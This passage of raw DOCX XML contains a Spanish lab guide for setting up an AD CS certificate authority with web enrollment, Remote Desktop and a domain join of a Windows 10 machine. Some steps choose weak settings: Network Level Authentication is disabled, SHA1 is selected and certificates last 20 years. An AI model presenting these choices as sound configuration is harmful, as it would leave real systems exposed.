          <w:p w14:paraId="797F79AC" w14:textId="67A7A94E" w:rsidR="000F6118" w:rsidRDefault="000F6118" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26170B20" wp14:editId="5D1292C8">
                  <wp:extent cx="5400040" cy="5805170"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                  <wp:docPr id="216556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6936" name=""/>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32DA053E" w14:textId="77777777" w:rsidR="006D5426" w:rsidRDefault="006D5426" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5790D726" w14:textId="0C390745" w:rsidR="006D5426" w:rsidRDefault="006D5426" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Las características para instalar el servidor de certificados se marcan por defecto por lo cual no tendremos que seleccionar ninguna y le datemos a siguiente hasta llegar a servicios de rol, que escogeremos inscripción web de entidad de certificación:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4935CF72" w14:textId="77777777" w:rsidR="006D5426" w:rsidRDefault="006D5426" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0BB9C958" w14:textId="74BFFFFA" w:rsidR="006D5426" w:rsidRDefault="002F4475" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04CC06D9" wp14:editId="222F5693">
                  <wp:extent cx="5400040" cy="4524375"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                  <wp:docPr id="23032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022" name=""/>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5400040" cy="4524375"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F9A7C7B" w14:textId="77777777" w:rsidR="006D5426" w:rsidRDefault="006D5426" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="08FDC3A4" w14:textId="43AD3A3A" w:rsidR="006D5426" w:rsidRDefault="006D5426" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Y ahora será siguiente, siguiente hasta finalizar la </w:t>
            </w:r>
            <w:r w:rsidR="002F4475">
              <w:t>instalación</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28AD82AE" w14:textId="77777777" w:rsidR="006D5426" w:rsidRDefault="006D5426" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="35CA0C4D" w14:textId="3BDACD9E" w:rsidR="00563E1B" w:rsidRDefault="00737140" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Ahora configurare el escritorio remoto:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6012C41D" w14:textId="77777777" w:rsidR="00737140" w:rsidRDefault="00737140" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="04C5D093" w14:textId="7DA63780" w:rsidR="00737140" w:rsidRDefault="00737140" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CAC25F4" wp14:editId="2338F69B">
                  <wp:extent cx="5400040" cy="5805170"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                  <wp:docPr id="326848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48057" name=""/>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6C75BD84" w14:textId="77777777" w:rsidR="00563E1B" w:rsidRDefault="00563E1B" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6A1C0F11" w14:textId="77777777" w:rsidR="00563E1B" w:rsidRDefault="00563E1B" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="770B7940" w14:textId="5E54DDDA" w:rsidR="00563E1B" w:rsidRDefault="00737140" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78CFCF9B" wp14:editId="575C5E39">
                  <wp:extent cx="5400040" cy="5805170"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                  <wp:docPr id="1196422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2935" name=""/>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471A4886" w14:textId="77777777" w:rsidR="00737140" w:rsidRDefault="00737140" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3A2D679C" w14:textId="1922E169" w:rsidR="00737140" w:rsidRDefault="00737140" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Habilitando la opción de Permitir las conexiones remotas, y desactivando la de Permitir solo las conexiones desde equipos que ejecuten Escritorio Remoto con Autentificación a nivel de red.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37D65A49" w14:textId="77777777" w:rsidR="00871597" w:rsidRDefault="00871597" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4939B87B" w14:textId="3FE316E0" w:rsidR="00CB54A5" w:rsidRDefault="00871597" w:rsidP="00CB54A5">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ahora quedaría crear una cuenta de administrador local, el usuario sería </w:t>
            </w:r>
            <w:r w:rsidR="00E25D51">
              <w:t>Administrador</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D7E2F2B" w14:textId="77777777" w:rsidR="00CB54A5" w:rsidRDefault="00CB54A5" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="597FDCB0" w14:textId="13BCBAE2" w:rsidR="00563E1B" w:rsidRDefault="00737140" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Y con esto ya estaría configurado.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E0B62CA" w14:textId="77777777" w:rsidR="00563E1B" w:rsidRDefault="00563E1B" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1164D3D8" w14:textId="77777777" w:rsidR="00CB207A" w:rsidRDefault="00CB207A" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4D8DA784" w14:textId="77777777" w:rsidR="00CB207A" w:rsidRDefault="00CB207A" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="695E5390" w14:textId="77777777" w:rsidR="00CB207A" w:rsidRDefault="00CB207A" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="78A9FF28" w14:textId="2EDF30B1" w:rsidR="00563E1B" w:rsidRDefault="00563E1B" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Ttulo2"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
            </w:pPr>
            <w:bookmarkStart w:id="8" w:name="_Toc135575965"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Configuración Global de las dos máquinas:</w:t>
            </w:r>
            <w:bookmarkEnd w:id="8"/>
          </w:p>
          <w:p w14:paraId="302DD637" w14:textId="77777777" w:rsidR="00563E1B" w:rsidRDefault="00563E1B" w:rsidP="00563E1B"/>
          <w:p w14:paraId="64D971E3" w14:textId="3F1D266E" w:rsidR="00563E1B" w:rsidRDefault="00563E1B" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Aquí vamos a añadir al dominio al equipo de Windows 10</w:t>
            </w:r>
            <w:r w:rsidR="00672003">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BEF4651" w14:textId="77777777" w:rsidR="00672003" w:rsidRDefault="00672003" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="19E88E7F" w14:textId="39C3EDD5" w:rsidR="00672003" w:rsidRDefault="00672003" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Para hacer esto vamos a Mi Equipo y dentro del, botón derecho </w:t>
            </w:r>
            <w:r w:rsidR="00F55BEE">
              <w:t>propiedades</w:t>
            </w:r>
            <w:r w:rsidR="003756F7">
              <w:t xml:space="preserve"> -&gt; Configuración avanzada del sistema</w:t>
            </w:r>
            <w:r>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D29F652" w14:textId="77777777" w:rsidR="003756F7" w:rsidRDefault="003756F7" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="27AFDEAE" w14:textId="56F1B72B" w:rsidR="003756F7" w:rsidRDefault="003756F7" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="120CD6CC" wp14:editId="11991259">
                  <wp:extent cx="5400040" cy="5805170"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                  <wp:docPr id="1689615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5162" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId46"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2B36F95E" w14:textId="77777777" w:rsidR="003756F7" w:rsidRDefault="003756F7" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="04D4A899" w14:textId="55A89F11" w:rsidR="003756F7" w:rsidRDefault="003756F7" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Y nos dirigiremos a nombre del equipo, le daremos a cambiar el nombre se lo cambiaremos por EquipoW01, y el dominio pondremos</w:t>
            </w:r>
            <w:r w:rsidR="00CE56FB">
              <w:t xml:space="preserve"> google</w:t>
            </w:r>
            <w:r>
              <w:t>.local y daremos en aceptar:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="121ECFC5" w14:textId="77777777" w:rsidR="003756F7" w:rsidRDefault="003756F7" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="29F83B7C" w14:textId="45D80F7C" w:rsidR="003756F7" w:rsidRDefault="008D6F95" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CD6F4FF" wp14:editId="2D819229">
                  <wp:extent cx="6095238" cy="4571429"/>
                  <wp:effectExtent l="0" t="0" r="1270" b="635"/>
                  <wp:docPr id="193969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91017" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId47">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6095238" cy="4571429"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="4928D486" w14:textId="77777777" w:rsidR="003756F7" w:rsidRDefault="003756F7" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="25C818F0" w14:textId="36EE4343" w:rsidR="003756F7" w:rsidRDefault="00D73349" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D973854" wp14:editId="5D58EA4C">
                  <wp:extent cx="5400040" cy="5805170"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                  <wp:docPr id="745458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8781" name=""/>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629C45D2" w14:textId="77777777" w:rsidR="00D73349" w:rsidRDefault="00D73349" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D8EDC9C" w14:textId="2060F325" w:rsidR="00D73349" w:rsidRDefault="00D73349" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Y ahora se reiniciará y estaremos en el dominio.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59A26995" w14:textId="77777777" w:rsidR="006D5426" w:rsidRDefault="006D5426" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="51966466" w14:textId="72C20819" w:rsidR="006D5426" w:rsidRDefault="006D5426" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Ahora lo configuraremos:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D5B9AE0" w14:textId="77777777" w:rsidR="00401311" w:rsidRDefault="00401311" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="249C9FB2" w14:textId="36A256FB" w:rsidR="00401311" w:rsidRDefault="00401311" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Se no</w:t>
            </w:r>
            <w:r w:rsidR="006A17E1">
              <w:t>s</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> abrirá un asistente introduciremos las credenciales del administrador del dominio:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DFEFD0C" w14:textId="77777777" w:rsidR="00401311" w:rsidRDefault="00401311" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1163B719" w14:textId="2B30229D" w:rsidR="00401311" w:rsidRDefault="00401311" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70ACB6D3" wp14:editId="2CEEBC08">
                  <wp:extent cx="5400040" cy="5805170"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                  <wp:docPr id="352502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02751" name=""/>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3B810CC0" w14:textId="77777777" w:rsidR="003756F7" w:rsidRDefault="003756F7" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1894D478" w14:textId="77777777" w:rsidR="003756F7" w:rsidRDefault="003756F7" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7F6034ED" w14:textId="1D389DFD" w:rsidR="00672003" w:rsidRDefault="00401311" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Marcaremos estas dos opciones:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FBBC8F0" w14:textId="77777777" w:rsidR="00401311" w:rsidRDefault="00401311" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3F9756D6" w14:textId="05BC84E2" w:rsidR="00401311" w:rsidRDefault="00401311" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C427612" wp14:editId="0CB84B36">
                  <wp:extent cx="5400040" cy="5805170"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                  <wp:docPr id="50011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4113" name=""/>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3CA48BAA" w14:textId="77777777" w:rsidR="00401311" w:rsidRDefault="00401311" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="143CD21B" w14:textId="712D01B6" w:rsidR="00401311" w:rsidRDefault="00401311" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Ahora elegiremos CA empresarial:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="464008FC" w14:textId="77777777" w:rsidR="00401311" w:rsidRDefault="00401311" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="659C1CE7" w14:textId="48BDBD5E" w:rsidR="00401311" w:rsidRDefault="00401311" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3216952B" wp14:editId="27655A2E">
                  <wp:extent cx="5400040" cy="5805170"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                  <wp:docPr id="2035475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75693" name=""/>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402C718A" w14:textId="77777777" w:rsidR="00401311" w:rsidRDefault="00401311" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6B4F8F69" w14:textId="69162D50" w:rsidR="00401311" w:rsidRDefault="00401311" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Ca raíz:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18959757" w14:textId="77777777" w:rsidR="00401311" w:rsidRDefault="00401311" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3017E4C1" w14:textId="5D85FD78" w:rsidR="00401311" w:rsidRDefault="00401311" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7859CEC4" wp14:editId="285E1DCE">
                  <wp:extent cx="5400040" cy="5805170"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                  <wp:docPr id="188254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2728" name=""/>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30E1F50D" w14:textId="77777777" w:rsidR="00401311" w:rsidRDefault="00401311" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5F41DAE0" w14:textId="6F91ADD2" w:rsidR="00401311" w:rsidRDefault="00401311" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Y ahora crear clave privada nueva:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C9BA73F" w14:textId="77777777" w:rsidR="00401311" w:rsidRDefault="00401311" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="69576268" w14:textId="55882C5B" w:rsidR="00401311" w:rsidRDefault="00401311" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="641A9093" wp14:editId="6A29385B">
                  <wp:extent cx="5400040" cy="5805170"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                  <wp:docPr id="4288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3762" name=""/>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4A8D80A3" w14:textId="77777777" w:rsidR="00401311" w:rsidRDefault="00401311" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6C4F8615" w14:textId="5FCAC9F8" w:rsidR="00401311" w:rsidRDefault="00401311" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Elegimos sha1:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EC06F99" w14:textId="77777777" w:rsidR="00401311" w:rsidRDefault="00401311" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7CA56171" w14:textId="1521ADF8" w:rsidR="00401311" w:rsidRDefault="00401311" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="481BCE9F" wp14:editId="6DD28732">
                  <wp:extent cx="5400040" cy="5805170"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                  <wp:docPr id="1564958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58777" name=""/>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0E0F7C61" w14:textId="77777777" w:rsidR="00401311" w:rsidRDefault="00401311" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2140B147" w14:textId="30B9D4A9" w:rsidR="00401311" w:rsidRDefault="00401311" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Configuraremos el nombre:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E3C4871" w14:textId="77777777" w:rsidR="00401311" w:rsidRDefault="00401311" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="745E8CD4" w14:textId="4B6A057B" w:rsidR="00401311" w:rsidRDefault="00401311" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D612091" wp14:editId="522B2F32">
                  <wp:extent cx="5400040" cy="5805170"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                  <wp:docPr id="1678504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4019" name=""/>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34E62041" w14:textId="77777777" w:rsidR="006A67CD" w:rsidRDefault="006A67CD" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="16B3C0DD" w14:textId="1CE67D70" w:rsidR="006A67CD" w:rsidRDefault="006A67CD" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Ahora pondremos el tiempo de concesión a 20 años:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7712C428" w14:textId="77777777" w:rsidR="006A67CD" w:rsidRDefault="006A67CD" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="531FB6EA" w14:textId="15AF9526" w:rsidR="006A67CD" w:rsidRDefault="006A67CD" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BF97D84" wp14:editId="7D50F8F5">
                  <wp:extent cx="5400040" cy="5805170"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                  <wp:docPr id="1201798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8925" name=""/>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76FDEAF7" w14:textId="77777777" w:rsidR="006A67CD" w:rsidRDefault="006A67CD" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="66AEE981" w14:textId="4F30F24C" w:rsidR="006A67CD" w:rsidRDefault="006A67CD" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>A partir de aquí todo es siguiente hasta finalizar.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B4E6A39" w14:textId="77777777" w:rsidR="006A67CD" w:rsidRDefault="006A67CD" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5A8F4F39" w14:textId="45A098BF" w:rsidR="006A67CD" w:rsidRDefault="006A67CD" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Accediendo a la página del certificado:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65B7E869" w14:textId="77777777" w:rsidR="006A67CD" w:rsidRDefault="006A67CD" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="718D599E" w14:textId="3EB159D3" w:rsidR="006A67CD" w:rsidRDefault="006A67CD" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34CFD1C3" wp14:editId="23AF0513">
                  <wp:extent cx="5400040" cy="5805170"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                  <wp:docPr id="519002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02774" name=""/>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035CEDD0" w14:textId="77777777" w:rsidR="00672003" w:rsidRPr="00563E1B" w:rsidRDefault="00672003" w:rsidP="00563E1B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="400D159F" w14:textId="776E7BBC" w:rsidR="00FD1261" w:rsidRDefault="0054336E" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Ahora crearemos un usuario normal en el dominio sin permisos:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FC33F7D" w14:textId="77777777" w:rsidR="0054336E" w:rsidRDefault="0054336E" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4B382F89" w14:textId="22374965" w:rsidR="0054336E" w:rsidRDefault="0054336E" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
